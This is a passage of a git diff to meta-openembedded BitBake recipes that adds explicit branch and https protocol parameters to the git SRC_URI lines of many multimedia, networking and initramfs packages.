index 7403cf64f7..c890165b6a 100644 --- a/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_8.40.bb +++ b/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_8.40.bb @@ -14,7 +14,7 @@ DEPENDS_append_libc-musl = " libexecinfo" S = "${WORKDIR}/git" SRCREV = "79c5cfa02c567efdc5bb18cdd584789e2e35aa23" -SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https; \ +SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;branch=master \ file://grubby-rename-grub2-editenv-to-grub-editenv.patch \ file://run-ptest \ file://0001-Add-another-variable-LIBS-to-provides-libraries-from.patch \ diff --git a/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_git.bb b/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_git.bb index 7248147a5c..c0797ac5c6 100644 --- a/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_git.bb +++ b/meta-openembedded/meta-initramfs/recipes-devtools/grubby/grubby_git.bb @@ -14,7 +14,7 @@ DEPENDS_append_libc-musl = " libexecinfo" S = "${WORKDIR}/git" SRCREV = "a1d2ae93408c3408e672d7eba4550fdf27fb0201" -SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https; \ +SRC_URI = "git://github.com/rhboot/grubby.git;protocol=https;branch=master \ file://grubby-rename-grub2-editenv-to-grub-editenv.patch \ file://run-ptest \ file://0001-Add-another-variable-LIBS-to-provides-libraries-from.patch \ diff --git a/meta-openembedded/meta-initramfs/recipes-devtools/mtd/ubi-utils-klibc_2.0.2.bb b/meta-openembedded/meta-initramfs/recipes-devtools/mtd/ubi-utils-klibc_2.0.2.bb index d322381621..fe5898a903 100644 --- a/meta-openembedded/meta-initramfs/recipes-devtools/mtd/ubi-utils-klibc_2.0.2.bb +++ b/meta-openembedded/meta-initramfs/recipes-devtools/mtd/ubi-utils-klibc_2.0.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \ inherit autotools pkgconfig klibc SRCREV = "64f61a9dc71b158c7084006cbce4ea23886f0b47" -SRC_URI = "git://git.infradead.org/mtd-utils.git \ +SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \ file://0001-libmissing.h-fix-klibc-build-when-using-glibc-toolch.patch \ file://0002-Instead-of-doing-preprocessor-magic-just-output-off_.patch \ file://0003-Makefile.am-only-build-ubi-utils.patch \ diff --git a/meta-openembedded/meta-initramfs/recipes-kernel/kexec/kexec-tools-klibc_git.bb b/meta-openembedded/meta-initramfs/recipes-kernel/kexec/kexec-tools-klibc_git.bb index 7ad55d8b8c..143ac6f433 100644 --- a/meta-openembedded/meta-initramfs/recipes-kernel/kexec/kexec-tools-klibc_git.bb +++ b/meta-openembedded/meta-initramfs/recipes-kernel/kexec/kexec-tools-klibc_git.bb @@ -12,7 +12,7 @@ DEPENDS = "zlib xz" inherit klibc autotools -SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kexec/kexec-tools.git" +SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kexec/kexec-tools.git;branch=master" SRCREV = "5750980cdbbc33ef75bfba6660295b932376ce15" BUILD_PATCHES = "file://0001-force-static-build.patch \ diff --git a/meta-openembedded/meta-multimedia/recipes-connectivity/libupnp/libupnp_git.bb b/meta-openembedded/meta-multimedia/recipes-connectivity/libupnp/libupnp_git.bb index 828e351be6..ef473c4896 100644 --- a/meta-openembedded/meta-multimedia/recipes-connectivity/libupnp/libupnp_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-connectivity/libupnp/libupnp_git.bb @@ -12,7 +12,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=394a0f17b97f33426275571e15920434" PV = "1.8.4+git${SRCPV}" # release-1.8.4 SRCREV = "d5a01fc9895daae98a0c5a8c7d3afce46add529d" -SRC_URI = "git://github.com/mrjimenez/pupnp.git;protocol=https \ +SRC_URI = "git://github.com/mrjimenez/pupnp.git;protocol=https;branch=master \ file://CVE-2020-13848.patch" S="${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-dvb/tvheadend/tvheadend_git.bb b/meta-openembedded/meta-multimedia/recipes-dvb/tvheadend/tvheadend_git.bb index 20faef047e..32e74f08c3 100644 --- a/meta-openembedded/meta-multimedia/recipes-dvb/tvheadend/tvheadend_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-dvb/tvheadend/tvheadend_git.bb @@ -8,7 +8,7 @@ DEPENDS = "avahi cmake-native dvb-apps libdvbcsa libpcre2 openssl uriparser zlib LICENSE = "GPLv3+" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=9cae5acac2e9ee2fc3aec01ac88ce5db" -SRC_URI = "git://github.com/tvheadend/tvheadend.git \ +SRC_URI = "git://github.com/tvheadend/tvheadend.git;branch=master;protocol=https \ file://0001-adjust-for-64bit-time_t.patch \ file://0001-allocate-space-for-buf-on-heap.patch \ " diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/dca/dcadec_0.2.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/dca/dcadec_0.2.0.bb index 1a51abc360..343b9d7915 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/dca/dcadec_0.2.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/dca/dcadec_0.2.0.bb @@ -4,7 +4,7 @@ LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING.LGPLv2.1;md5=4fbd65380cdd255951079008b364516c" SRCREV = "b93deed1a231dd6dd7e39b9fe7d2abe05aa00158" -SRC_URI = "git://github.com/foo86/dcadec.git;protocol=https \ +SRC_URI = "git://github.com/foo86/dcadec.git;protocol=https;branch=master \ file://0001-define-BASELIB-make-variable.patch \ " diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-connector-dbus_0.3.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-connector-dbus_0.3.0.bb index f23bc6ca81..c89156dcf8 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-connector-dbus_0.3.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-connector-dbus_0.3.0.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ DEPENDS = "glib-2.0 dbus dleyna-core" -SRC_URI = "git://github.com/01org/${BPN}.git" +SRC_URI = "git://github.com/01org/${BPN}.git;branch=master;protocol=https" SRCREV = "de913c35e5c936e2d40ddbd276ee902cd802bd3a" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-core_0.6.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-core_0.6.0.bb index 8939cd36e2..647532d9fa 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-core_0.6.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-core_0.6.0.bb @@ -13,7 +13,7 @@ DEPENDS = "glib-2.0 gupnp" PV .= "+git${SRCPV}" -SRC_URI = "git://github.com/01org/${BPN}.git" +SRC_URI = "git://github.com/01org/${BPN}.git;branch=master;protocol=https" SRCREV = "1c6853f5bc697dc0a8774fd70dbc915c4dbe7c5b" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb index 642f21bd53..4b53763440 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-renderer_0.6.0.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c \ DEPENDS = "glib-2.0 gssdp gupnp gupnp-av gupnp-dlna libsoup-2.4 dleyna-core" RDEPENDS_${PN} = "dleyna-connector-dbus" -SRC_URI = "git://github.com/01org/${BPN}.git \ +SRC_URI = "git://github.com/01org/${BPN}.git;branch=master;protocol=https \ file://0001-add-gupnp-1.2-API-support.patch \ " SRCREV = "50fd1ec9d51328e7dea98874129dc8d6fe3ea1dd" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb index e31b7aea2a..5fa3e2373a 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/dleyna/dleyna-server_0.6.0.bb @@ -12,7 +12,7 @@ DEPENDS = "glib-2.0 gssdp gupnp gupnp-av gupnp-dlna libsoup-2.4 libxml2 dleyna-c RDEPENDS_${PN} = "dleyna-connector-dbus" PV .= "+git${SRCPV}" -SRC_URI = "git://github.com/01org/${BPN}.git" +SRC_URI = "git://github.com/01org/${BPN}.git;branch=master;protocol=https" SRCREV = "eb895ae82715e9889a948ffa810c0f828b4f4c76" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/fdk-aac/fdk-aac_2.0.1.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/fdk-aac/fdk-aac_2.0.1.bb index d7911681c7..c499119c6f 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/fdk-aac/fdk-aac_2.0.1.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/fdk-aac/fdk-aac_2.0.1.bb @@ -11,7 +11,7 @@ LICENSE = "Fraunhofer_FDK_AAC_Codec_Library_for_Android" LICENSE_FLAGS = "commercial" LIC_FILES_CHKSUM = "file://NOTICE;md5=5985e1e12f4afa710d64ed7bfd291875" -SRC_URI = "git://github.com/mstorsjo/fdk-aac.git;protocol=git;branch=master" +SRC_URI = "git://github.com/mstorsjo/fdk-aac.git;protocol=https;branch=master" SRCREV = "d387d3b6ed79ff9a82c60440bdd86e6e5e324bec" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc b/meta-openembedded/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc index fcc9df8c30..ee3e38cd93 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/fluidsynth/fluidsynth.inc @@ -4,7 +4,7 @@ SECTION = "libs/multimedia" LICENSE = "LGPL-2.1" LIC_FILES_CHKSUM = "file://LICENSE;md5=fc178bcd425090939a8b634d1d6a9594" -SRC_URI = "git://github.com/FluidSynth/fluidsynth.git" +SRC_URI = "git://github.com/FluidSynth/fluidsynth.git;branch=master;protocol=https" SRCREV = "19a20eb8526465fdf940b740b13462d71e190a1a" S = "${WORKDIR}/git" PV = "2.1.3" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/gerbera/gerbera_git.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/gerbera/gerbera_git.bb index c96e4c52e9..2f9ceffab7 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/gerbera/gerbera_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/gerbera/gerbera_git.bb @@ -3,7 +3,7 @@ Description = "Gerbera - An UPnP media server" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=25cdec9afe3f1f26212ead6bd2f7fac8" -SRC_URI = "git://github.com/v00d00/gerbera.git;protocol=https \ +SRC_URI = "git://github.com/v00d00/gerbera.git;protocol=https;branch=master \ " PV = "1.3.2" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/gstreamer-1.0/gst-shark_git.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/gstreamer-1.0/gst-shark_git.bb index d047caef5f..19d43a4b74 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/gstreamer-1.0/gst-shark_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/gstreamer-1.0/gst-shark_git.bb @@ -14,10 +14,10 @@ PV = "0.6.1" SRCREV_base = "c41a05cc9e2310c2f73eda4b4f0b4477bf4479c5" SRCREV_common = "88e512ca7197a45c4114f7fa993108f23245bf50" - +SRCREV_FORMAT = "base_common" SRC_URI = " \ git://github.com/RidgeRun/gst-shark.git;protocol=https;branch=${SRCBRANCH};name=base \ - git://gitlab.freedesktop.org/gstreamer/common.git;protocol=https;destsuffix=git/common;name=common; \ + git://gitlab.freedesktop.org/gstreamer/common.git;protocol=https;destsuffix=git/common;name=common;branch=master \ " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/libcamera/libcamera.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/libcamera/libcamera.bb index 3f8fe2f360..e16fd25962 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/libcamera/libcamera.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/libcamera/libcamera.bb @@ -9,7 +9,7 @@ LIC_FILES_CHKSUM = "\ " SRC_URI = " \ - git://linuxtv.org/libcamera.git;protocol=git \ + git://linuxtv.org/libcamera.git;protocol=git;branch=master \ " SRCREV = "a8be6e94e79f602d543a15afd44ef60e378b138f" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/libdvbcsa/libdvbcsa_1.1.0.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/libdvbcsa/libdvbcsa_1.1.0.bb index 7f042c382f..4cf8e2effc 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/libdvbcsa/libdvbcsa_1.1.0.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/libdvbcsa/libdvbcsa_1.1.0.bb @@ -5,7 +5,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" SRCREV = "bc6c0b164a87ce05e9925785cc6fb3f54c02b026" -SRC_URI = "git://code.videolan.org/videolan/libdvbcsa.git;protocol=https \ +SRC_URI = "git://code.videolan.org/videolan/libdvbcsa.git;protocol=https;branch=master \ file://libdvbcsa.pc \ " diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/libsquish/libsquish_git.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/libsquish/libsquish_git.bb index f060f1e80d..cb42d943fc 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/libsquish/libsquish_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/libsquish/libsquish_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://alpha.cpp;beginline=3;endline=22;md5=6665e479f71feb92 PV = "1.10+git${SRCPV}" SRCREV = "52e7d93c5947f72380521116c05d97c528863ba8" -SRC_URI = "git://github.com/OpenELEC/libsquish.git;protocol=https" +SRC_URI = "git://github.com/OpenELEC/libsquish.git;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/mimic/mimic_1.2.0.2.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/mimic/mimic_1.2.0.2.bb index b313b110cc..4631b037be 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/mimic/mimic_1.2.0.2.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/mimic/mimic_1.2.0.2.bb @@ -20,7 +20,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=416ef1ca5167707fe381d7be33664a33" DEPENDS = "curl-native icu" SRCREV = "67e43bf0fa56008276b878ec3790aa5f32eb2a16" -SRC_URI = "git://github.com/MycroftAI/mimic.git" +SRC_URI = "git://github.com/MycroftAI/mimic.git;branch=master;protocol=https" inherit autotools diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/musicbrainz/libmusicbrainz_git.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/musicbrainz/libmusicbrainz_git.bb index ca9d94a19c..253f995d88 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/musicbrainz/libmusicbrainz_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/musicbrainz/libmusicbrainz_git.bb @@ -8,7 +8,7 @@ DEPENDS = "expat libxml2 libxml2-native neon neon-native" PV = "5.1.0+git${SRCPV}" SRCREV = "44c05779dd996035758f5ec426766aeedce29cc3" -SRC_URI = "git://github.com/metabrainz/libmusicbrainz.git \ +SRC_URI = "git://github.com/metabrainz/libmusicbrainz.git;branch=master;protocol=https \ file://allow-libdir-override.patch " S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/libmpdclient_2.16.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/libmpdclient_2.16.bb index 235e63e481..84b7baab23 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/libmpdclient_2.16.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/libmpdclient_2.16.bb @@ -6,7 +6,7 @@ HOMEPAGE = "https://www.musicpd.org/libs/libmpdclient/" inherit meson SRC_URI = " \ - git://github.com/MusicPlayerDaemon/libmpdclient \ + git://github.com/MusicPlayerDaemon/libmpdclient;branch=master;protocol=https \ " SRCREV = "4e8d990eb5239566ee948f1cd79b7248e008620a" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpc_0.31.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpc_0.31.bb index 41abe7108a..b4fce35df7 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpc_0.31.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpc_0.31.bb @@ -10,7 +10,7 @@ DEPENDS += " \ " SRC_URI = " \ - git://github.com/MusicPlayerDaemon/mpc \ + git://github.com/MusicPlayerDaemon/mpc;branch=master;protocol=https \ " SRCREV = "59875acdf34e5f0eac0c11453c49daef54f78413" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpd_0.20.22.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpd_0.20.22.bb index 133ee6e792..3f20515993 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpd_0.20.22.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/mpd_0.20.22.bb @@ -17,7 +17,7 @@ DEPENDS += " \ " SRC_URI = " \ - git://github.com/MusicPlayerDaemon/MPD;branch=v0.20.x \ + git://github.com/MusicPlayerDaemon/MPD;branch=v0.20.x;protocol=https \ file://mpd.conf.in \ file://0001-StringBuffer-Include-cstddef-for-size_t.patch \ file://0002-Include-stdexcept-for-runtime_error.patch \ diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.34.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.34.bb index 0c99c7c698..c92a4421a3 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.34.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/musicpd/ncmpc_0.34.bb @@ -31,7 +31,7 @@ PACKAGECONFIG[outputs_screen] = "-Doutputs_screen=true,-Doutputs_screen=false" PACKAGECONFIG[chat_screen] = "-Dchat_screen=true,-Dchat_screen=false" SRC_URI = " \ - git://github.com/MusicPlayerDaemon/ncmpc \ + git://github.com/MusicPlayerDaemon/ncmpc;branch=master;protocol=https \ " SRCREV = "79cf9905355f25bc5cc6d5a05d2846d75342f554" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/mycroft/mycroft_19.8.1.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/mycroft/mycroft_19.8.1.bb index 62d1ad7f74..e71cb87014 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/mycroft/mycroft_19.8.1.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/mycroft/mycroft_19.8.1.bb @@ -7,7 +7,7 @@ LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.md;md5=79aa497b11564d1d419ee889e7b498f6" SRCREV = "913f29d3d550637934f9abf43a097eb2c30d76fc" -SRC_URI = "git://github.com/MycroftAI/mycroft-core.git;branch=master \ +SRC_URI = "git://github.com/MycroftAI/mycroft-core.git;branch=master;protocol=https \ file://0001-Remove-python-venv.patch \ file://0002-dev_setup.sh-Remove-the-git-dependency.patch \ file://0003-dev_setup.sh-Remove-the-TERM-dependency.patch \ diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/openal/openal-soft_1.19.1.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/openal/openal-soft_1.19.1.bb index a9cdfac8a9..5787f22036 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/openal/openal-soft_1.19.1.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/openal/openal-soft_1.19.1.bb @@ -7,7 +7,7 @@ inherit cmake pkgconfig # openal-soft-1.19.1 SRCREV = "6761218e51699f46bf25c377e65b3e9ea5e434b9" -SRC_URI = "git://github.com/kcat/openal-soft \ +SRC_URI = "git://github.com/kcat/openal-soft;branch=master;protocol=https \ file://0001-Use-BUILD_CC-to-compile-native-tools.patch \ file://0002-makehrtf-Disable-Wstringop-truncation.patch \ " diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/rtmpdump/rtmpdump_2.4.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/rtmpdump/rtmpdump_2.4.bb index 5f78be4f51..53ee2a82fb 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/rtmpdump/rtmpdump_2.4.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/rtmpdump/rtmpdump_2.4.bb @@ -9,7 +9,7 @@ DEPENDS = "gnutls zlib" SRCREV = "fa8646daeb19dfd12c181f7d19de708d623704c0" SRC_URI = " \ - git://git.ffmpeg.org/rtmpdump \ + git://git.ffmpeg.org/rtmpdump;branch=master \ file://fix-racing-build-issue.patch" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/tinyalsa/tinyalsa.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/tinyalsa/tinyalsa.bb index 062096892e..68cf8795a6 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/tinyalsa/tinyalsa.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/tinyalsa/tinyalsa.bb @@ -7,7 +7,7 @@ LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://NOTICE;md5=dbdefe400d894b510a9de14813181d0b" SRCREV = "8449529c7e50f432091539ba7b438e79b04059b5" -SRC_URI = "git://github.com/tinyalsa/tinyalsa \ +SRC_URI = "git://github.com/tinyalsa/tinyalsa;branch=master;protocol=https \ file://0001-Use-CMAKE_INSTALL_-path-instead-of-hardcoding-bin-li.patch \ " PV = "1.1.1+git${SRCPV}" diff --git a/meta-openembedded/meta-multimedia/recipes-multimedia/tremor/tremor_20180319.bb b/meta-openembedded/meta-multimedia/recipes-multimedia/tremor/tremor_20180319.bb index 6abf6080bd..f8ab1bf680 100644 --- a/meta-openembedded/meta-multimedia/recipes-multimedia/tremor/tremor_20180319.bb +++ b/meta-openembedded/meta-multimedia/recipes-multimedia/tremor/tremor_20180319.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=db1b7a668b2a6f47b2af88fb008ad555 \ file://os.h;beginline=3;endline=14;md5=5c0af5e1bedef3ce8178c89f48cd6f1f" DEPENDS = "libogg" -SRC_URI = "git://gitlab.xiph.org/xiph/tremor.git;protocol=https \ +SRC_URI = "git://gitlab.xiph.org/xiph/tremor.git;protocol=https;branch=master \ file://obsolete_automake_macros.patch;striplevel=0 \ file://tremor-arm-thumb2.patch \ " diff --git a/meta-openembedded/meta-multimedia/recipes-support/crossguid/crossguid.bb b/meta-openembedded/meta-multimedia/recipes-support/crossguid/crossguid.bb index 228b8b6540..f2d6e7a241 100644 --- a/meta-openembedded/meta-multimedia/recipes-support/crossguid/crossguid.bb +++ b/meta-openembedded/meta-multimedia/recipes-support/crossguid/crossguid.bb @@ -10,7 +10,7 @@ DEPENDS += "util-linux" PV = "0.0+git${SRCPV}" SRCREV = "b56957ac453575e91ca1b63a80c0077c2b0d011a" -SRC_URI = "git://github.com/graeme-hill/crossguid;protocol=https" +SRC_URI = "git://github.com/graeme-hill/crossguid;protocol=https;branch=master" S = "${WORKDIR}/git" diff --git a/meta-openembedded/meta-multimedia/recipes-support/gst-instruments/gst-instruments_git.bb b/meta-openembedded/meta-multimedia/recipes-support/gst-instruments/gst-instruments_git.bb index feffa9fe19..50c69a9a08 100644 --- a/meta-openembedded/meta-multimedia/recipes-support/gst-instruments/gst-instruments_git.bb +++ b/meta-openembedded/meta-multimedia/recipes-support/gst-instruments/gst-instruments_git.bb @@ -9,7 +9,7 @@ DEPENDS = "gstreamer1.0" S = "${WORKDIR}/git" SRCREV = "3b862e52e5c53ad1023dc6808effa4cb75572c4b" -SRC_URI = "git://github.com/kirushyk/gst-instruments.git;protocol=https;" +SRC_URI = "git://github.com/kirushyk/gst-instruments.git;protocol=https;branch=master" FILES_${PN}-staticdev += "${libdir}/gstreamer-1.0/*a" FILES_${PN} += "${libdir}/*" diff --git a/meta-openembedded/meta-networking/recipes-connectivity/cannelloni/cannelloni_git.bb b/meta-openembedded/meta-networking/recipes-connectivity/cannelloni/cannelloni_git.bb index d4a62bd92d..4cb85f8151 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/cannelloni/cannelloni_git.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/cannelloni/cannelloni_git.bb @@ -2,7 +2,7 @@ SUMMARY = "a SocketCAN over Ethernet tunnel" HOMEPAGE = "https://github.com/mguentner/cannelloni" LICENSE = "GPLv2" -SRC_URI = "git://github.com/mguentner/cannelloni.git;protocol=https \ +SRC_URI = "git://github.com/mguentner/cannelloni.git;protocol=https;branch=master \ file://0001-Use-GNUInstallDirs-instead-of-hard-coding-paths.patch \ file://0002-include-missing-stdexcept-for-runtime_error.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-connectivity/civetweb/civetweb_git.bb b/meta-openembedded/meta-networking/recipes-connectivity/civetweb/civetweb_git.bb index 2820f9fa6d..e9c2056180 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/civetweb/civetweb_git.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/civetweb/civetweb_git.bb @@ -6,7 +6,7 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=50bd1d7f135b50d7e218996ba28d0d88" SRCREV = "4b440a339979852d5a51fb11a822952712231c23" PV = "1.12+git${SRCPV}" -SRC_URI = "git://github.com/civetweb/civetweb.git \ +SRC_URI = "git://github.com/civetweb/civetweb.git;branch=master;protocol=https \ file://0001-Unittest-Link-librt-and-libm-using-l-option.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-connectivity/dibbler/dibbler_git.bb b/meta-openembedded/meta-networking/recipes-connectivity/dibbler/dibbler_git.bb index 90051a319a..f856655904 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/dibbler/dibbler_git.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/dibbler/dibbler_git.bb @@ -7,7 +7,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=7236695bb6d4461c105d685a8b61c4e3" SRCREV = "c4b0ed52e751da7823dd9a36e91f93a6310e5525" -SRC_URI = "git://github.com/tomaszmrugalski/dibbler \ +SRC_URI = "git://github.com/tomaszmrugalski/dibbler;branch=master;protocol=https \ file://dibbler_fix_getSize_crash.patch \ file://0001-linux-port-Rename-pthread_mutex_t-variable-lock.patch \ " diff --git a/meta-openembedded/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.20.bb b/meta-openembedded/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.20.bb index 2c39c4c443..1ea0cb16d3 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.20.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/freeradius/freeradius_3.0.20.bb @@ -13,7 +13,7 @@ LICENSE = "GPLv2 & LGPLv2+" LIC_FILES_CHKSUM = "file://LICENSE;md5=eb723b61539feef013de476e68b5c50a" DEPENDS = "openssl-native openssl libidn libtool libpcap libtalloc" -SRC_URI = "git://github.com/FreeRADIUS/freeradius-server.git;branch=v3.0.x;lfs=0; \ +SRC_URI = "git://github.com/FreeRADIUS/freeradius-server.git;branch=v3.0.x;lfs=0;protocol=https \ file://freeradius \ file://volatiles.58_radiusd \ file://freeradius-enble-user-in-conf.patch \ diff --git a/meta-openembedded/meta-networking/recipes-connectivity/libdnet/libdnet_1.12.bb b/meta-openembedded/meta-networking/recipes-connectivity/libdnet/libdnet_1.12.bb index 5b27cfe155..c1a8146119 100644 --- a/meta-openembedded/meta-networking/recipes-connectivity/libdnet/libdnet_1.12.bb +++ b/meta-openembedded/meta-networking/recipes-connectivity/libdnet/libdnet_1.12.bb @@ -4,7 +4,7 @@ SECTION = "libs" LICENSE = "BSD-3-Clause" LIC_FILES_CHKSUM = "file://LICENSE;md5=0036c1b155f4e999f3e0a373490b5db9" -SRC_URI = "git://github.com/dugsong/libdnet.git;nobranch=1" +SRC_URI = "git://github.com/dugsong/libdnet.git;nobranch=1;protocol=https" SRCREV = "12fca29a6d4e99d1b923d6820887fe7b24226904" UPSTREAM_CHECK_GITTAGREGEX = "libdnet-(?P\d+(\.\d+)+)" diff 